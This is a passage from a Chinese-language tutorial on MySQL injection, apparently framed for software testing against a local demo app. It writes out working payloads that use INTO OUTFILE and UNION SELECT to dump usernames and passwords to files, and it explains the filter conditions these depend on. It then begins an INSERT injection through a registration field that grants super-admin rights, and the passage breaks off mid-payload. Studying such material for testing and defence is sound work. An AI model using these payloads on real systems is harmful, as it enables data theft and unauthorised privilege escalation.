软件测试mysql注入语句_Mysql注入:SQL Injection with MySQL

三、导出文件

这个是比较容易构造但又有一定限制的技术，我们经常可以看见以下的SQL语句：

select * from table into outfile 'c:/file.txt'

select * from table into outfile '/var/www/file.txt'

但这样的语句，一般很少用在程序里，有谁会把自己的数据导出呢？除非是备份，但我也没有见过这种备份法。所以我们要自己构造，但必须有下面的前提条件：

必须导出到能访问的目录，这样才能下载。

能访问的目录必须要有可写的权限，否则导出会失败。

确保硬盘有足够的容量能容下导出的数据，这个很少见。

确保要已经存在相同的文件名，会导致导出失败，并提示：“File 'c:/file.txt' already exists”，这样可以防止数据库表和文件例如/etc/passwd被破坏。

我们继续用上面的user.php和show.php两个文件举例，如果一个一个用户猜解实在是太慢了，如果对方的密码或者其他敏感信息很复杂，又不会写Exploit，要猜到什么时候啊？来点大范围的，直接导出全部数据好了。user.php文件的查询语句，我们按照into outfile的标准格式，注入成下面的语句就能导出我们需要的信息了：

SELECT * FROM user WHERE username='$username' into outfile 'c:/file.txt'

知道怎么样的语句可以实现我们的目的，我们就很容易构造出相应的语句：

http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt

出现了错误提示，但从返回的语句看来，我们的SQL语句确实是注入正确了，即使出现错误，也是查询的问题了，文件还是乖乖的被导出了，如图：

由于代码本身就有WHERE来指定一个条件，所以我们导出的数据仅仅是满足这个条件的数据，如果我们想导出全部呢？其实很简单，只要使这个WHERE条件为假，并且指定一个成真的条件，就可以不用被束缚在WHERE里了，来看看经典1=1发挥作用了：

http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt

实际的SQL语句变为：

SELECT * FROM user WHERE username='' or 1=1 into outfile 'c:/file.txt'

这样username的参数是空的，就是假了，1=1永远是真的，那or前面的WHERE就不起作用了，但千万别用and哦，否则是不能导出全部数据的。

既然条件满足，在这种情况下就直接导出所有数据！如图：

但是跨表的导出文件的语句该怎么构造呢？还是用到UNION联合查询，所以一切前提条件都应该和UNION、导出数据一样，跨表导出数据正常情况下应该相下面的一样：

SELECT * FROM article WHERE articleid='1' union select 1,username,password from user into outfile 'c:/user.txt'

这样可以导出文件了，如果我们要构造就提交：

http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user into outfile 'c:/user.txt

文件是出来了，可是有一个问题，由于前面的查询articleid='1'为真了，所以导出的数据也有整个文章的一部分，如图：

所以我们把应该使前面的查询语句为假，才能只导出后面查询的内容，只要提交：

http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

这样才能得到我们想要的资料：

值得注意的是想要导出文件，必须magic_quotes_gpc没有打开，并且程序也没有用到addslashes()函数，还有不能对单引号做任何过滤，因为我们在提交导出路径的时候，一定要用引号包含起来，否则，系统不会认识那是一个路径，也不用尝试用char()或者什么函数，那是徒劳。

INSERT

如果大家认为MYSQL中注入仅仅适用于SELECT就大错特错了，其实还有两个危害更大的操作，那就是INSERT和UPDATE语句，这类例子不多，先面先说说INSERT，这主要应用于改写插入的数据，我们来看个简单而又广泛存在的例子，看看下面的数据结构：

CREATE TABLE `user` (

`userid` INT NOT NULL AUTO_INCREMENT ,

`username` VARCHAR( 20 ) NOT NULL ,

`password` VARCHAR( 50 ) NOT NULL ,

`homepage` VARCHAR( 255 ) NOT NULL ,

`userlevel` INT DEFAULT '1' NOT NULL ,

PRIMARY KEY ( `userid` )

);

其中的userlevel代表用户的等级，1是普通用户，2是普通管理员，3是超级管理员，一个注册程序默认是注册成普通用户，如下：

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

默认userlevel字段是插入1，其中的变量都是没有经过过滤就直接写入数据库的，不知道大家有什么想法？对，就是直接注入，使我们一注册就是超级管理员。我们注册的时候，构造$homepage变量，就可以达到改写的目的，指定$homepage变量为：

http://4ngel.net', '